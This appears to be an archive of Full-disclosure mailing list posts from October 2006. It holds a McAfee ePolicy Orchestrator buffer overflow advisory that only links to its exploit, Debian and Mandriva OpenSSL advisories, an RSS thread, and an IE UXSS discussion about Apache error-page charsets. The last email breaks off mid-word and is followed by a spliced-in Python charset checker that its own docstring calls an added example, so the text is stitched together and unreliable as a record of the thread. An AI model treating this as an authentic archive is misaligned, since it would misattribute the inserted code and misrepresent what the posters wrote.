[-] Product Information

McAfee® ePolicy Orchestrator® is a security management solution that gives
you a coordinated defense against malicious threats and attacks. As your
central hub, you can keep protection up to date; configure and enforce
protection policies; and monitor security status from one centralized
console.

[-] Vulnerability Description

McAfee® ePolicy Orchestrator® contains a pre-authentication buffer overflow
vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP
server, and is also vulnerable.

[-] Exploit

Proof of concept exploit code is available at
http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm

[-] Exploitation Details

http://www.remote-exploit.org/advisories/mcafee-epo.pdf

[-] Vendor Status

Vendor was notified July 14th, 2006. ehm.

[-] Credits

The vulnerability was discovered by Mati Aharoni (muts) and xbxice.
[-] Shameless Promotion

Get ready for BackTrack v.2.0!

From eaton.lists at gmail.com Mon Oct 2 19:27:13 2006
From: eaton.lists at gmail.com (Brian Eaton)
Date: Mon, 2 Oct 2006 14:27:13 -0400
Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
In-Reply-To:
References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com>
Message-ID: <242a0a8f0610021127l634151b3v1e762eccdb41526f@mail.gmail.com>

On 10/2/06, Paul Schmehl wrote:
> --On October 2, 2006 9:44:27 AM -0400 Brian Eaton
> wrote:
> >
> > I'm guessing that you tested a server with some kind of customized 404
> > response that neglected to include a charset specification. That's
> > not a vulnerability in Apache, that is poor site configuration.
> >
> Brian, a question for clarification. When you say "customized 404
> response", you are not referring to a customized error document (as
> described briefly in the httpd.conf file) but rather to having changed the
> headers that the server returns when queried with a GET request, correct?
> And wouldn't this require changing source code and compiling a custom
> build of apache?

I am referring to the customized error documents described in the
httpd.conf file. No recompiling required.

The default Apache response for 404s includes a content-type header
specifying the iso-8859-1 charset. If you set up an ErrorDocument handler,
though, Apache assumes you know what you are doing and does not include a
charset specification in the content-type header. You need to do it
yourself. Including a meta http-equiv tag in the HTML seems like an obvious
fix, but there are other ways as well.
Regards,
Brian

From noahm at debian.org Mon Oct 2 20:33:19 2006
From: noahm at debian.org (Noah Meyerhans)
Date: Mon, 2 Oct 2006 21:33:19 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1185-2] New openssl packages fix arbitrary code execution
Message-ID: <20061002193319.GA3496@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1185-2                     security at debian.org
http://www.debian.org/security/                             Noah Meyerhans
October 2nd, 2006                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openssl
Vulnerability  : denial of service
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2940

The fix used to correct CVE-2006-2940 introduced code that could lead to
the use of uninitialized memory. Such use is likely to cause the
application using the openssl library to crash, and has the potential to
allow an attacker to cause the execution of arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 0.9.7e-3sarge4.

For the unstable and testing distributions (sid and etch, respectively),
these problems will be fixed in version 0.9.7k-3 of the openssl097
compatibility libraries, and version 0.9.8c-3 of the openssl package.

We recommend that you upgrade your openssl package. Note that services
linking against the openssl shared libraries will need to be restarted.
Common examples of such services include most Mail Transport Agents, SSH
servers, and web servers.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
--------------------------------

These files will probably be moved into the stable distribution on
its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From security at mandriva.com Mon Oct 2 21:52:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 2 Oct 2006 14:52:00 -0600
Subject: [Full-disclosure] [ MDKSA-2006:172-1 ] - Updated openssl packages fix vulnerabilities
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:172-1
http://www.mandriva.com/security/
_______________________________________________________________________

Package : openssl
Date    : October 2, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Dr S N Henson of the OpenSSL core team and Open Network Security recently
developed an ASN1 test suite for NISCC (www.niscc.gov.uk). When the test
suite was run against OpenSSL two denial of service vulnerabilities were
discovered.

During the parsing of certain invalid ASN1 structures an error condition
is mishandled. This can result in an infinite loop which consumes system
memory. (CVE-2006-2937)

Certain types of public key can take disproportionate amounts of time to
process. This could be used by an attacker in a denial of service attack.
(CVE-2006-2940)

Tavis Ormandy and Will Drewry of the Google Security Team discovered a
buffer overflow in the SSL_get_shared_ciphers utility function, used by
some applications such as exim and mysql. An attacker could send a list
of ciphers that would overrun a buffer. (CVE-2006-3738)

Tavis Ormandy and Will Drewry of the Google Security Team discovered a
possible DoS in the sslv2 client code. Where a client application uses
OpenSSL to make a SSLv2 connection to a malicious server that server could
cause the client to crash. (CVE-2006-4343)

Updated packages are patched to address these issues.

Update:

There was an error in the original published patches for CVE-2006-2940.
New packages have corrected this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From security at mandriva.com Mon Oct 2 22:23:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 2 Oct 2006 15:23:00 -0600
Subject: [Full-disclosure] [ MDKSA-2006:177 ] - Updated MySQL packages rebuilt against updated openssl.
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                           MDKSA-2006:177
http://www.mandriva.com/security/
_______________________________________________________________________

Package : MySQL
Date    : October 2, 2006
Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Openssl recently had several vulnerabilities which were patched
(CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built
against a static copy of the SSL libraries. As a precaution an updated
copy built against the new libraries is being made available.
_______________________________________________________________________

Updated Packages:

_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From gareth.davies at mynetsec.com Mon Oct 2 22:00:53 2006
From: gareth.davies at mynetsec.com (Gareth Davies)
Date: Tue, 03 Oct 2006 05:00:53 +0800
Subject: [Full-disclosure] Security Rss Feeds
In-Reply-To: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com>
References: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com>
Message-ID: <45217E05.5010008@mynetsec.com>

crazy frog crazy frog wrote:
> Hi,
>
> Please share various security related rss feeds you read daily.
>
> Thanks,
> -CF
>

http://feeds.feedburner.com/darknethackers is pretty useful too and
hasn't been mentioned yet.

I also subscribe to some general ones like Register Security feed,
digg/security, cnet security.

Cheers.

--
Gareth Davies - ISO 27001 LA, OPST
Manager - Security Practice
Network Security Solutions MSC Sdn. Bhd.
Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara, Mont' Kiara,
50480 Kuala Lumpur, Malaysia
Phone: +603-6203 5303 or +603-6203 5920
www.mynetsec.com

From psz at maths.usyd.edu.au Mon Oct 2 22:55:39 2006
From: psz at maths.usyd.edu.au (Paul Szabo)
Date: Tue, 3 Oct 2006 07:55:39 +1000
Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
In-Reply-To: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com>
Message-ID: <200610022155.k92LtdBZ024429@asti.maths.usyd.edu.au>

Brian Eaton wrote:

> ... I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a
> content-type header of "text/html; charset=iso-8859-1" for 404 responses ...

So, how "default" were your servers? On my own server (Debian package
apache2-common version 2.0.54-5sarge1) I see in apache2.conf:

Alias /error/ "/usr/share/apache2/error/"
...
ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
...

but those modules are not mentione
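Brian Eaton's point and Paul Szabo's apache2.conf excerpt both come down to whether the 404 response ends up declaring a charset anywhere. The check below is an added example, not code from either poster or from Apache: it walks the two places a charset can be declared (the Content-Type header, then a meta tag in the first bytes of the body) over constructed sample responses, and flags the custom ErrorDocument case that declares neither.

```python
"""Does an HTTP response declare its character set?

Added example for the IE UXSS thread; not code from any poster or from
Apache. A charset may come from the Content-Type header (Apache's default
404) or, for a custom ErrorDocument page that Apache sends without one,
from a <meta> tag near the top of the HTML. A response that declares it in
neither place leaves the browser to sniff one, which is the configuration
the thread warns about.
"""
import re
from typing import Dict, Optional, Tuple

# "text/html; charset=iso-8859-1" -> iso-8859-1
CT_CHARSET = re.compile(r';\s*charset\s*=\s*"?([A-Za-z0-9._:-]+)', re.I)
# Any <meta ...> tag; the charset is then looked for inside the tag, which
# covers both <meta charset="..."> and the http-equiv Content-Type form.
META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
CHARSET_ATTR = re.compile(r"charset\s*=\s*[\"']?([A-Za-z0-9._:-]+)", re.I)
# Only the leading bytes of the body count: browsers pick an encoding
# early, so a <meta> buried deep in the page does not help.
META_WINDOW = 4096


def split_response(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:  # skip status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def header_charset(headers: Dict[str, str]) -> Optional[str]:
    m = CT_CHARSET.search(headers.get("content-type", ""))
    return m.group(1).lower() if m else None


def meta_charset(body: bytes) -> Optional[str]:
    text = body[:META_WINDOW].decode("latin-1")  # latin-1 never fails
    for tag in META_TAG.findall(text):
        m = CHARSET_ATTR.search(tag)
        if m:
            return m.group(1).lower()
    return None


def declared_charset(raw: bytes) -> Tuple[Optional[str], Optional[str]]:
    """Return (where, charset); (None, None) means nothing declares one."""
    headers, body = split_response(raw)
    cs = header_charset(headers)
    if cs:
        return "header", cs
    cs = meta_charset(body)
    if cs:
        return "meta", cs
    return None, None


# Constructed sample responses (not captured from any real server).
APACHE_DEFAULT_404 = (
    b"HTTP/1.1 404 Not Found\r\nServer: Apache\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
    b"<html><head><title>404 Not Found</title></head><body></body></html>")
CUSTOM_404_NO_CHARSET = (
    b"HTTP/1.1 404 Not Found\r\nServer: Apache\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><head><title>Missing</title></head><body>No such page</body></html>")
CUSTOM_404_WITH_META = (
    b"HTTP/1.1 404 Not Found\r\nServer: Apache\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b'<html><head><meta http-equiv="Content-Type" '
    b'content="text/html; charset=utf-8"><title>Missing</title></head>'
    b"<body>No such page</body></html>")

if __name__ == "__main__":
    for name, raw in [("apache default 404", APACHE_DEFAULT_404),
                      ("custom ErrorDocument", CUSTOM_404_NO_CHARSET),
                      ("custom ErrorDocument + meta", CUSTOM_404_WITH_META)]:
        where, cs = declared_charset(raw)
        verdict = f"OK ({where}: {cs})" if cs else "NO CHARSET DECLARED"
        print(f"{name}: {verdict}")
```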